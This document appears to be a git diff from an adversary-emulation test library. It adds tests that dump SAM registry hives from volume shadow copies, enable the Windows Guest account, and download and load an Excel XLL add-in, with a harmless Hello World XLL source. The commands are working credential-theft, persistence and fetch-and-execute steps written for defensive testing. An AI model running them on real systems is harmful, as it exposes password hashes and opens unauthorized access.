 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Add-ins](../../T1137.006/T1137.006.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -5440,6 +5440,75 @@ credential-access:
          Invoke-PowerDump
        name: powershell
        elevation_required: true
+    - name: dump volume shadow copy hives with certutil
+      auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7
+      description: |
+        Dump hives from volume shadow copies with the certutil utility
+        This can be done with a non-admin user account
+      supported_platforms:
+      - windows
+      input_arguments:
+        dump_path:
+          description: Path where the hive will be dumped
+          type: Path
+          default: "$ENV:temp"
+        target_hive:
+          description: Hive you wish to dump
+          type: String
+          default: SAM
+        dumped_hive:
+          description: Name of the dumped hive
+          type: String
+          default: myhive
+      executor:
+        command: |
+          write-host ""
+          $shadowlist = get-wmiobject win32_shadowcopy
+          $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
+          $maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
+          $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+          certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2
+        name: powershell
+        elevation_required: false
+        cleanup_command: |
+          write-host ""
+          $toremove = #{dump_path} + "\" + '#{dumped_hive}'
+          rm $toremove
+    - name: dump volume shadow copy hives with System.IO.File
+      auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
+      description: 'Dump hives from volume shadow copies with System.IO.File
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        dump_path:
+          description: Path where the hive will be dumped
+          type: Path
+          default: "$ENV:temp"
+        target_hive:
+          description: Hive you wish to dump
+          type: String
+          default: SAM
+        dumped_hive:
+          description: Name of the dumped hive
+          type: String
+          default: myhive
+      executor:
+        command: |
+          write-host ""
+          $shadowlist = get-wmiobject win32_shadowcopy
+          $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
+          $maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
+          $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+          $mydump = #{dump_path} + '\' + '#{dumped_hive}'
+          [System.IO.File]::Copy($shadowpath , $mydump)
+        name: powershell
+        elevation_required: false
+        cleanup_command: |-
+          write-host ""
+          $toremove = #{dump_path} + "\" + '#{dumped_hive}'
+          rm $toremove
  T1555.002:
    technique:
      external_references:
@@ -11661,6 +11730,23 @@ privilege-escalation:
          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
        name: command_prompt
        elevation_required: true
+    - name: Activate Guest Account
+      auto_generated_guid: aa6cb8c4-b582-4f8e-b677-37733914abda
+      description: 'The Adversaries can activate the default Guest user. The guest
+        account is inactivated by default
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: 'net user guest /active:yes
+
+'
+        cleanup_command: 'net user guest /active:no
+
+'
+        name: command_prompt
+        elevation_required: true
  T1078.002:
    technique:
      external_references:
@@ -21886,6 +21972,23 @@ defense-evasion:
          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
        name: command_prompt
        elevation_required: true
+    - name: Activate Guest Account
+      auto_generated_guid: aa6cb8c4-b582-4f8e-b677-37733914abda
+      description: 'The Adversaries can activate the default Guest user. The guest
+        account is inactivated by default
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: 'net user guest /active:yes
+
+'
+        cleanup_command: 'net user guest /active:no
+
+'
+        name: command_prompt
+        elevation_required: true
  T1578.003:
    technique:
      external_references:
@@ -37573,7 +37676,31 @@ persistence:
      x_mitre_platforms:
      - Windows
      - Office 365
-    atomic_tests: []
+      identifier: T1137.006
+    atomic_tests:
+    - name: Code Executed Via Excel Add-in File (Xll)
+      auto_generated_guid: 441b1a0f-a771-428a-8af0-e99e4698cda3
+      description: "Downloads a XLL file and loads it using the excel add-ins library.\nThis
+        causes excel to display the message \"Hello World\"\nSource of XLL - https://github.com/edparcell/HelloWorldXll
+        \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        xll_url:
+          description: url of the file HelloWorldXll.xll
+          type: url
+          default: https://https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1137.006/bin/HelloWorldXll.xll?raw=true
+        local_file:
+          description: name of the xll file
+          type: path
+          default: "$env:tmp\\HelloWorldXll.xll"
+      executor:
+        name: powershell
+        elevation_required: true
+        command: 'powershell -c "iwr -URI ''#{xll_url}'' -o ''#{local_file}''; IEX
+          ((new-object -ComObject excel.application).RegisterXLL(''$env:tmp\HelloWorldXll.xll''))"
+
+'
  T1098.001:
    technique:
      external_references:
@@ -40346,6 +40473,23 @@ persistence:
          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
        name: command_prompt
        elevation_required: true
+    - name: Activate Guest Account
+      auto_generated_guid: aa6cb8c4-b582-4f8e-b677-37733914abda
+      description: 'The Adversaries can activate the default Guest user. The guest
+        account is inactivated by default
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: 'net user guest /active:yes
+
+'
+        cleanup_command: 'net user guest /active:no
+
+'
+        name: command_prompt
+        elevation_required: true
  T1136.002:
    technique:
      created: '2020-01-28T14:05:17.825Z'
@@ -68797,6 +68941,23 @@ initial-access:
          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
        name: command_prompt
        elevation_required: true
+    - name: Activate Guest Account
+      auto_generated_guid: aa6cb8c4-b582-4f8e-b677-37733914abda
+      description: 'The Adversaries can activate the default Guest user. The guest
+        account is inactivated by default
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: 'net user guest /active:yes
+
+'
+        cleanup_command: 'net user guest /active:no
+
+'
+        name: command_prompt
+        elevation_required: true
  T1078.002:
    technique:
      external_references:
@@ -32,6 +32,10 @@ Notes:

 - [Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames](#atomic-test-4---powerdump-registry-dump-of-sam-for-hashes-and-usernames)

+- [Atomic Test #5 - dump volume shadow copy hives with certutil](#atomic-test-5---dump-volume-shadow-copy-hives-with-certutil)
+
+- [Atomic Test #6 - dump volume shadow copy hives with System.IO.File](#atomic-test-6---dump-volume-shadow-copy-hives-with-systemiofile)
+

 <br/>

@@ -204,4 +208,98 @@ Invoke-PowerDump



+<br/>
+<br/>
+
+## Atomic Test #5 - dump volume shadow copy hives with certutil
+Dump hives from volume shadow copies with the certutil utility
+This can be done with a non-admin user account
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** eeb9751a-d598-42d3-b11c-c122d9c3f6c7
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dump_path | Path where the hive will be dumped | Path | $ENV:temp|
+| target_hive | Hive you wish to dump | String | SAM|
+| dumped_hive | Name of the dumped hive | String | myhive|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+write-host ""
+$shadowlist = get-wmiobject win32_shadowcopy
+$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
+$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
+$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2
+```
+
+#### Cleanup Commands:
+```powershell
+write-host ""
+$toremove = #{dump_path} + "\" + '#{dumped_hive}'
+rm $toremove
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - dump volume shadow copy hives with System.IO.File
+Dump hives from volume shadow copies with System.IO.File
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9d77fed7-05f8-476e-a81b-8ff0472c64d0
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dump_path | Path where the hive will be dumped | Path | $ENV:temp|
+| target_hive | Hive you wish to dump | String | SAM|
+| dumped_hive | Name of the dumped hive | String | myhive|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+write-host ""
+$shadowlist = get-wmiobject win32_shadowcopy
+$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
+$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
+$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+$mydump = #{dump_path} + '\' + '#{dumped_hive}'
+[System.IO.File]::Copy($shadowpath , $mydump)
+```
+
+#### Cleanup Commands:
+```powershell
+write-host ""
+$toremove = #{dump_path} + "\" + '#{dumped_hive}'
+rm $toremove
+```
+
+
+
+
+
 <br/>
@@ -98,4 +98,73 @@ atomic_tests:
      Invoke-PowerDump
    name: powershell
    elevation_required: true
-  
+
+- name: dump volume shadow copy hives with certutil
+  auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7
+  description: |
+    Dump hives from volume shadow copies with the certutil utility
+    This can be done with a non-admin user account
+  supported_platforms:
+  - windows
+  input_arguments:
+    dump_path:
+      description: Path where the hive will be dumped
+      type: Path
+      default: $ENV:temp
+    target_hive:
+      description: Hive you wish to dump
+      type: String
+      default: SAM
+    dumped_hive:
+      description: Name of the dumped hive
+      type: String
+      default: myhive
+  executor:
+    command: |
+      write-host ""
+      $shadowlist = get-wmiobject win32_shadowcopy
+      $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
+      $maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
+      $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+      certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2
+    name: powershell
+    elevation_required: false 
+    cleanup_command: |
+      write-host ""
+      $toremove = #{dump_path} + "\" + '#{dumped_hive}'
+      rm $toremove
+
+- name: dump volume shadow copy hives with System.IO.File
+  auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
+  description: |
+    Dump hives from volume shadow copies with System.IO.File
+  supported_platforms:
+  - windows
+  input_arguments:
+    dump_path:
+      description: Path where the hive will be dumped
+      type: Path
+      default: $ENV:temp
+    target_hive:
+      description: Hive you wish to dump
+      type: String
+      default: SAM
+    dumped_hive:
+      description: Name of the dumped hive
+      type: String
+      default: myhive
+  executor:
+    command: |
+      write-host ""
+      $shadowlist = get-wmiobject win32_shadowcopy
+      $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
+      $maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
+      $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+      $mydump = #{dump_path} + '\' + '#{dumped_hive}'
+      [System.IO.File]::Copy($shadowpath , $mydump)
+    name: powershell
+    elevation_required: false 
+    cleanup_command: |
+      write-host ""
+      $toremove = #{dump_path} + "\" + '#{dumped_hive}'
+      rm $toremove
@@ -8,6 +8,8 @@ Default accounts are not limited to client machines, rather also include account

 - [Atomic Test #1 - Enable Guest account with RDP capability and admin privileges](#atomic-test-1---enable-guest-account-with-rdp-capability-and-admin-privileges)

+- [Atomic Test #2 - Activate Guest Account](#atomic-test-2---activate-guest-account)
+

 <br/>

@@ -58,4 +60,36 @@ if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentCon



+<br/>
+<br/>
+
+## Atomic Test #2 - Activate Guest Account
+The Adversaries can activate the default Guest user. The guest account is inactivated by default
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** aa6cb8c4-b582-4f8e-b677-37733914abda
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+net user guest /active:yes
+```
+
+#### Cleanup Commands:
+```cmd
+net user guest /active:no
+```
+
+
+
+
+
 <br/>
@@ -38,3 +38,20 @@ atomic_tests:
      if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
    name: command_prompt
    elevation_required: true
+
+- name: Activate Guest Account
+  auto_generated_guid: aa6cb8c4-b582-4f8e-b677-37733914abda
+  description: |
+    The Adversaries can activate the default Guest user. The guest account is inactivated by default
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+     net user guest /active:yes
+    cleanup_command: |
+     net user guest /active:no
+    name: command_prompt
+    elevation_required: true
+
+
+
@@ -0,0 +1,47 @@
+# T1137.006 - Add-ins
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137/006)
+<blockquote>Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)
+
+Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. </blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Code Executed Via Excel Add-in File (Xll)](#atomic-test-1---code-executed-via-excel-add-in-file-xll)
+
+
+<br/>
+
+## Atomic Test #1 - Code Executed Via Excel Add-in File (Xll)
+Downloads a XLL file and loads it using the excel add-ins library.
+This causes excel to display the message "Hello World"
+Source of XLL - https://github.com/edparcell/HelloWorldXll
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 441b1a0f-a771-428a-8af0-e99e4698cda3
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| xll_url | url of the file HelloWorldXll.xll | url | https://https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1137.006/bin/HelloWorldXll.xll?raw=true|
+| local_file | name of the xll file | path | $env:tmp&#92;HelloWorldXll.xll|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+powershell -c "iwr -URI '#{xll_url}' -o '#{local_file}'; IEX ((new-object -ComObject excel.application).RegisterXLL('$env:tmp\HelloWorldXll.xll'))"
+```
+
+
+
+
+
+
+<br/>
@@ -0,0 +1,31 @@
+attack_technique: T1137.006
+display_name: 'Office Application Startup: Add-ins'
+
+atomic_tests:
+- name: Code Executed Via Excel Add-in File (Xll)
+  auto_generated_guid: 441b1a0f-a771-428a-8af0-e99e4698cda3
+  description: |
+    Downloads a XLL file and loads it using the excel add-ins library.
+    This causes excel to display the message "Hello World"
+    Source of XLL - https://github.com/edparcell/HelloWorldXll 
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    xll_url:
+      description: url of the file HelloWorldXll.xll
+      type: url
+      default: 'https://https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1137.006/bin/HelloWorldXll.xll?raw=true'
+
+    local_file:
+      description: name of the xll file 
+      type: path
+      default: '$env:tmp\HelloWorldXll.xll'
+
+  executor:
+    name: powershell
+    elevation_required: true 
+    command: |
+      powershell -c "iwr -URI '#{xll_url}' -o '#{local_file}'; IEX ((new-object -ComObject excel.application).RegisterXLL('$env:tmp\HelloWorldXll.xll'))"
+  
@@ -0,0 +1,12 @@
+Copyright (c) 2015, Edward Parcell
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.24720.0
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HelloWorldXll", "HelloWorldXll\HelloWorldXll.vcxproj", "{0A5476B7-2700-4B0C-A72C-3054B5064E96}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Debug|x64.ActiveCfg = Debug|x64
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Debug|x64.Build.0 = Debug|x64
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Debug|x86.ActiveCfg = Debug|Win32
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Debug|x86.Build.0 = Debug|Win32
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Release|x64.ActiveCfg = Release|x64
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Release|x64.Build.0 = Release|x64
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Release|x86.ActiveCfg = Release|Win32
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
@@ -0,0 +1,21 @@
+// HelloWorldXll.cpp : Defines the exported functions for the DLL application.
+//
+
+#include "stdafx.h"
+
+
+short __stdcall xlAutoOpen()
+{
+	char *text = "Hello world";
+	size_t text_len = strlen(text);
+	XLOPER message;
+	message.xltype = xltypeStr;
+	message.val.str = (char *)malloc(text_len + 2);
+	memcpy(message.val.str + 1, text, text_len + 1);
+	message.val.str[0] = (char)text_len;
+	XLOPER dialog_type;
+	dialog_type.xltype = xltypeInt;
+	dialog_type.val.w = 2;
+	Excel4(xlcAlert, NULL, 2, &message, &dialog_type);
+	return 1;
+}
@@ -0,0 +1,2 @@
+EXPORTS
+	xlAutoOpen
@@ -0,0 +1,190 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{0A5476B7-2700-4B0C-A72C-3054B5064E96}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>HelloWorldXll</RootNamespace>
+    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+    <TargetExt>.xll</TargetExt>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+    <TargetExt>.xll</TargetExt>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;HELLOWORLDXLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
